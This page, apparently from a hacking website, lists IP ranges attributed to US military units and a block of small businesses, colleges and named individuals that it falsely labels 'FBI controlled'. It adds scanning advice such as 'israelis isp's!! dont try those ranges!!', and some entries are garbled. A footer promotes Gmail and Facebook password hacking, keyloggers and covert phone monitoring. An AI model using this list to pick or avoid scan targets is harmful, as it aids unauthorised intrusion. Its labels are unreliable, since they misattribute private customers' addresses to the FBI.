204.34.157.0 - 204.34.160.0 Defense Information School
204.34.161.0 Naval Air Systems Command
204.34.162.0 Puget Sound Naval Shipyard
204.34.163.0 Joint Precision Strike Demonstration
204.34.164.0 Naval Pacific Meteorology and Ocean
204.34.165.0 Joint Precision Strike Demonstration
204.34.167.0 USAF
204.34.168.0 Commander
204.34.169.0 Naval Air Warfare Center
204.34.170.0 Naval Air Systems Command
204.34.171.0 NAVSTA SUPPLY DEPARTMENT
204.34.173.0 SUBMEPP Activity
204.34.174.0 COMMANDER TASK FORCE 74 YOKOSUKA JAPAN
204.34.176.0 DISA-PAC,IPC-GUAM
204.34.177.0 Satellite Production Test Center
204.34.181.0 940 Air Refueling Wing
204.34.182.0 Defense Megacenter Warner Robins
204.34.183.0 GCCS Support Facility
204.34.184.0 Nav Air Tech Serv Facility-Detachment
204.34.185.0 NAVAL SUPPORT FACILITY, DIEGO GARCIA
204.34.186.0 Defense Logistics Agency - Europe
204.34.187.0 NAVMASSO
204.34.188.0 Commander-In-Chief, US Pacific Fleet
204.34.189.0 Defense MegaCenter - St Louis
204.34.190.0 NAVMASSO
204.34.192.0 HQ SOCEUR
204.34.193.0 Second Marine Expeditionary Force
204.34.194.0 Second Marine Expeditionary Force
204.34.195.0 Second Marine Expeditionary Force
204.34.196.0 NAVCOMTELSTAWASHDC
204.34.197.0 INFORMATION SYSTEMS TECHNOLOGY CENTER
204.34.198.0 Naval Observatory Detachment, Colorado
204.34.199.0 NAVILCODETMECH
204.34.200.0 Navy Environmental Preventive Medicine
204.34.201.0 Port Hueneme Division, Naval Surf
204.34.202.0 Naval Facilities Engineering Housing
204.34.203.0 NAVSEA Logistics Command Detachment
204.34.204.0 Naval Air Warfare Center
204.34.205.0 Portsmouth Naval Shipyard
204.34.206.0 INFORMATION SYSTEMS TECHNOLOGY CENTER
204.34.208.0 - 204.34.210.0 Military Sealift Command Pacific
204.34.211.0 USAF Academy
204.34.212.0 3rd Combat Service Support
204.34.213.0 1st Radio Battalion
204.34.214.0 OASD (Health Affairs)
204.34.215.0 Second Marine Expeditionary Force
204.34.216.0 1st Marine Air Wing
204.34.217.0 SA-ALC/LTE
204.34.218.0 3rd Marine
204.34.219.0 Communications and Electronics
204.34.220.0 G-6 Operations
204.34.221.0 G-6 Operations
204.34.222.0 G-6 Operations
204.34.223.0 G-6 Operations
204.34.224.0 G-6 Operations
204.34.225.0 Joint Interoperability Test Command
204.34.226.0 NAVMASSO
204.34.227.0 NAVMASSO
204.34.228.0 - 204.34.228.255 Field Command Defense Nuclear Agency
204.34.229.0 Naval Space Command
204.34.230.0 Naval Pacific Meteorology and Oceanography
204.34.232.0 Military Family Housing
204.34.233.0 - 204.34.233.255 Navy Material Transportation Office
204.34.234.0 NAVMASSO
204.34.235.0 Defense Finance and Accounting Service
204.34.237.0 European Stars and Stripes
204.34.238.0 Pacific Stars and Stripes
204.34.239.0 PUGET SOUND NAVAL SHIPYARD
204.34.240.0 Nval Station, Guantanamo Bay
204.34.242.0 COMNAVSURFPAC
204.34.243.0 NAVMASSO
204.34.244.0 Amphibious Force, Seventh Fleet, U. S. Navy
204.34.245.0 USAF SpaceCommand
204.34.246.0 USAF
204.34.247.0 U.S. Army Special Operations Command
204.34.248.0 FLEET COMBAT TRAINING CENTER ATLA
204.34.249.0 Naval Aviation Depot North Island
204.34.250.0 NAVMASSO
204.34.251.0 NAVSEA Log Command Detachment Pacific
204.34.252.0 Command Special Boat Squadron One
204.34.253.0 AFPCA/GNNN
204.34.254.0 Navy Environmental Preventive Medicine

RANGE 205
205.0.0.0 - 205.117.255.0 Department of the Navy, Space and Naval Warfare System Command, Washington DC - SPAWAR
205.96.* - 205.103.*

RANGE 207
207.30.* Sprint/United Telephone of Florida

All the below are FBI controlled Linux servers & IPs/IP-Ranges

207.60.0.0 - 207.60.255.0 The Internet Access Company
207.60.2.128 - 207.60.2.255 Abacus Technology
207.60.3.0 - 207.60.3.127 Mass Electric Construction Co.
207.60.3.128 - 207.60.3.255 Peabody Proberties Inc
207.60.4.0 - 207.60.4.127 Northern Electronics
207.60.4.128 - 207.60.4.255 Posternak, Blankstein & Lund
207.60.5.64 - 207.60.5.127 Woodard & Curran
207.60.5.192 - 207.60.5.255 On Line Services
207.60.6.0 - 207.60.6.63 The 400 Group
207.60.6.64 - 207.60.6.127 RD Hunter and Company
207.60.6.128 - 207.60.6.191 Louis Berger and Associates
207.60.6.192 - 207.60.6.255 Ross-Simons
207.60.7.0 - 207.60.7.63 Eastern Cambridge Savings Bank
207.60.7.64 - 207.60.7.127 Greater Lawrence Community Action Committee
207.60.7.128 - 207.60.7.191 Data Electronic Devices, Inc
207.60.8.0 - 207.60.8.255 Sippican
207.60.9.0 - 207.60.9.31 Alps Sportswear Mfg Co
207.60.9.32 - 207.60.9.63 Escher Group Ltd
207.60.9.64 - 207.60.9.95 West Suburban Elder
207.60.9.96 - 207.60.9.127 Central Bank
207.60.9.128 - 207.60.9.159 Danick Systems
207.60.9.160 - 207.60.9.191 Alps Sportswear Mfg CO
207.60.9.192 - 207.60.9.223 BSCC
207.60.13.16 - 207.60.13.23 Patrons Insurance Group
207.60.13.40 - 207.60.13.47 Athera Technologies
207.60.13.48 - 207.60.13.55 Service Edge Partners Inc
207.60.13.56 - 207.60.13.63 Massachusetts Credit Union League
207.60.13.64 - 207.60.13.71 SierraCom
207.60.13.72 - 207.60.13.79 AI/ FOCS
207.60.13.80 - 207.60.13.87 Extreme soft
207.60.13.96 - 207.60.13.103 Eaton Seo Corp
207.60.13.112 - 207.60.13.119 C. White
207.60.13.120 - 207.60.13.127 Athera
207.60.13.128 - 207.60.13.135 Entropic Systems, INC
207.60.13.136 - 207.60.13.143 Wood Product Manufactureds Associates
207.60.13.160 - 207.60.13.167 Jamestown Distribution
207.60.13.168 - 207.60.13.175 C&M Computers
207.60.13.176 - 207.60.13.183 ABC Used Auto Parts
207.60.13.184 - 207.60.13.191 Tomas Weldon
207.60.13.192 - 207.60.13.199 Tage Inns
207.60.13.200 - 207.60.13.207 Control Module Inc
207.60.13.208 - 207.60.13.215 Hyper Crawler Information Systems
207.60.13.216 - 207.60.13.223 Eastern Bearings
207.60.13.224 - 207.60.13.231 North Shore Data Services
207.60.13.232 - 207.60.13.239 Mas New Hampshire
207.60.14.0 - 207.60.14.255 J. A. Webster
207.60.15.0 - 207.60.15.127 Trilogic
207.60.16.0 - 207.60.16.255 Area 54
207.60.18.0 - 207.60.18.63 Vested Development Inc
207.60.18.64 - 207.60.18.127 Conventures
207.60.21.0 - 207.60.21.255 Don Law Company
207.60.22.0 - 207.60.22.255 Advanced Microsensors
207.60.28.0 - 207.60.28.63 Applied Business Center
207.60.28.64 - 207.60.28.127 Color and Design Exchange
207.60.36.8 - 207.60.36.15 Shaun McCusker
207.60.36.16 - 207.60.36.23 Town of Framingham
207.60.36.24 - 207.60.36.31 AB Software
207.60.36.32 - 207.60.36.39 Seabass Dreams Too Much, Inc
207.60.36.40 - 207.60.36.47 Next Ticketing
207.60.36.48 - 207.60.36.55 Dulsi
207.60.36.56 - 207.60.36.63 The Internet Access Company
207.60.36.64 - 207.60.36.71 Maguire Group
207.60.36.72 - 207.60.36.79 Cogenex
207.60.36.88 - 207.60.36.95 AKNDC
207.60.36.96 - 207.60.36.103 McGovern election commitee
207.60.36.104 - 207.60.36.111 Digital Equipment Corp
207.60.36.112 - 207.60.36.119 PTR - Precision Technologies
207.60.36.120 - 207.60.36.127 Extech
207.60.36.128 - 207.60.36.135 Manfreddi Architects
207.60.36.144 - 207.60.36.151 Parent Naffah
207.60.36.152 - 207.60.36.159 Darling Dolls Inc
207.60.36.160 - 207.60.36.167 Wright Communications
207.60.36.168 - 207.60.36.175 Principle Software
207.60.36.176 - 207.60.36.183 Chris Pet Store
207.60.36.184 - 207.60.36.191 Fifteen Lilies
207.60.36.192 - 207.60.36.199 All-Com Technologies
207.60.37.0 - 207.60.37.31 Cardio Thoracic Surgical Associates, P. A.
207.60.37.32 - 207.60.37.63 Preferred Fixtures Inc
207.60.37.64 - 207.60.37.95 Apple and Eve Distributors
207.60.37.96 - 207.60.37.127 Nelson Copy Supply
207.60.37.128 - 207.60.37.159 Boston Optical Fiber
207.60.37.192 - 207.60.37.223 Fantasia&Company
207.60.41.0 - 207.60.41.255 Infoactive
207.60.48.0 - 207.60.48.255 Curry College
207.60.62.32 - 207.60.62.63 Alternate Power Source
207.60.62.64 - 207.60.62.95 Keystone Howley-White
207.60.62.128 - 207.60.62.159 Bridgehead Associates LTD
207.60.62.160 - 207.60.62.191 County Supply
207.60.62.192 - 207.60.62.223 NH Board of Nursing
207.60.64.0 - 207.60.64.63 Diversified Wireless Technologies
207.60.64.64 - 207.60.64.127 Phytera
207.60.66.0 - 207.60.66.15 The Network Connection
207.60.66.16 - 207.60.66.31 Young Refrigeration
207.60.66.32 - 207.60.66.47 Vision Appraisal Technology
207.60.66.48 - 207.60.66.63 EffNet Inc
207.60.66.64 - 207.60.66.79 Entropic Systems Inc
207.60.66.80 - 207.60.66.95 Finley Properties
207.60.66.96 - 207.60.66.111 Nancy Plowman Associates
207.60.66.112 - 207.60.66.127 Northeast Financial Strategies
207.60.66.128 - 207.60.66.143 Textnology Corp
207.60.66.144 - 207.60.66.159 Groton Neochem LLC
207.60.66.160 - 207.60.66.175 Tab Computers
207.60.66.176 - 207.60.66.191 Patrons Insurance
207.60.66.192 - 207.60.66.207 Chair City Web
207.60.66.208 - 207.60.66.223 Radex, Inc.
207.60.66.224 - 207.60.66.239 Robert Austein
207.60.66.240 - 207.60.66.255 Hologic Inc.
207.60.71.64 - 207.60.71.127 K-Tech International Inc.
207.60.71.128 - 207.60.71.191 Pan Communications
207.60.71.192 - 207.60.71.255 New England College of Finance
207.60.75.128 - 207.60.75.255 Absolve Technology
207.60.78.0 - 207.60.78.127 Extech
207.60.78.128 - 207.60.78.255 The Insight Group
207.60.83.0 - 207.60.83.255 JLM Technologies
207.60.84.0 - 207.60.84.255 Strategic Solutions
207.60.94.0 - 207.60.94.15 McWorks
207.60.94.32 - 207.60.94.47 Rooney RealEstate
207.60.94.48 - 207.60.94.63 Joseph Limo Service
207.60.94.64 - 207.60.94.79 The Portico Group
207.60.94.80 - 207.60.94.95 Event Travel Management Inc
207.60.94.96 - 207.60.94.111 Intellitech International
207.60.94.128 - 207.60.94.143 Orion Partners
207.60.94.144 - 207.60.94.159 Rainbow Software Solution
207.60.94.160 - 207.60.94.175 Grason Stadler Inc
207.60.94.192 - 207.60.94.207 Donnegan System
207.60.95.1 - 207.60.95.255 The Iprax Corp
207.60.102.0 - 207.60.102.63 Coporate IT
207.60.102.64 - 207.60.102.127 Putnam Technologies
207.60.102.128 - 207.60.102.191 Sycamore Networks
207.60.102.192 - 207.60.102.255 Bostek
2?7.6?.10?.128 - 207.60.103.255 Louis Berger and Associates
207.60.104.128 - 207.60.104.191 Hanson Data Systems
207.60.106.128 - 207.60.106.255 Giganet Inc.
207.60.107.0 - 207.60.107.255 Roll Systems
207.60.108.8 - 207.60.108.15 InternetQA
207.60.111.0 - 207.60.111.31 Reading Cooperative Bank
207.60.111.32 - 207.60.111.63 Edco collaborative
207.60.111.64 - 207.60.111.95 DTC Communications Inc
207.60.111.96 - 207.60.111.127 Mike Line
207.60.111.128 - 207.60.111.159 The Steppingstone Foundation
207.60.111.160 - 207.60.111.191 Caton Connector
207.60.111.192 - 207.60.111.223 Refron
207.60.111.224 - 207.60.111.255 Dolabany Comm Group
207.60.112.0 - 207.60.112.255 The CCS Companies
207.60.116.0 - 207.60.116.255 Continental PET Technologies
207.60.122.16 - 207.60.122.23 Corey & Company Designers Inc
207.60.122.24 - 207.60.122.31 SAIC
207.60.122.32 - 207.60.122.39 Netserve Entertainment Group
207.60.122.40 - 207.60.122.47 Avici Systems Inc
207.60.122.48 - 207.60.122.55 Webrdwne
207.60.122.56 - 207.60.122.63 Reality and Wonder
207.60.122.64 - 207.60.122.71 Nishan Desilva
207.60.122.72 - 207.60.122.79 NemaSoft Inc
207.60.122.80 - 207.60.122.87 Patrick Murphy
207.60.122.88 - 207.60.122.95 Corey and Company
207.60.122.96 - 207.60.122.103 Ames Textile Corp
207.60.122.104 - 207.60.122.111 Publicom
207.60.127.0 - Northstar Technologies
207.60.128.0 - 207.60.128.255 Northstar Technologies
207.60.129.0 - 207.60.129.255 Sanga Corp
207.60.129.64 - 207.60.129.127 Fired Up Network
207.60.129.128 - 207.60.129.191 Integrated Data Solutions
207.60.129.192 - 207.60.129.255 Metanext
207.61.* WorldLinx Telecommunications, Inc., Canada
207.120.* BBN Planet, MA

RANGE 208
208.240.xxx.xxx

RANGE 209
209.35.* Interland, Inc., GA

RANGE 212
212.56.107.22
212.143 *** israelis isp's!! dont try those ranges!!
212.149.*** israelis isp's!! dont try those ranges!!
212.159.0.2
212.159.1.1
212.159.1.4
212.159.1.5
212.159.0.2
212.159.1.1
212.159.1.4
212.159.1.5
212.159.33.56
212.159.40.211
212.159.41.173
212.179.*** israelis isp's!! dont try those ranges!!
212.208.0.12.*** israelis isp's!! dont try those ranges!!

RANGE 213
213.8.***.*** israelis isp's!! dont try those ranges!!

RANGE 216
216.25.* 216.94.***.*** 216.247.* 216.248.*.* 217
217.6.* Do not scan (Jamais scaner)


 
  • Gmail Hacking

    Wants to hack Gmail a/c password ? Learn best way to hack Gmail password..

  • Jailbreak Iphone/iPad

    Jailbreak your Iphone or iPad to give it more functionality free of cost...

  • Facebook Hacking

    Wants to hack Facebook password? But Don't Know Where to Start? Learn here......

  • MAC Keylogger

    Learn how to hack emails account password on MAC OS using keylogger....

  • Mobile Hacking

    Monitor mobiles,Records the activities of anyone who uses iPhone, BlackBerry....

Disclaimer

ALL INFORMATION / TUTORIALS WRITTEN ON WILDHACKER.COM ARE FOR EDUCATIONAL PURPOSES ONLY, THE SITE WILDHACKER.COM IS NOT RESPONSIBLE IN ANY WAY FOR HOW THIS INFORMATION IS USED, YOU USE IT AT YOUR OWN RISK. YOU MAY LEARN ALSO HOW TO GET YOUR OWN ACCOUNT BACK FROM ALL THIS INFRORMATION.

Recipes

Unlock Iphone Website Hacking

Facebook Hacking Keylogger

Unlock Blackberry Unlock Modem

Gmail Hacking Hack Yahoo

Hotmail Hacking Remote Hacking

Blog Archive

Traffic / Ranking

Powered by:

Wild Hacker © 2012. All Rights Reserved | Contact | Bloggers.com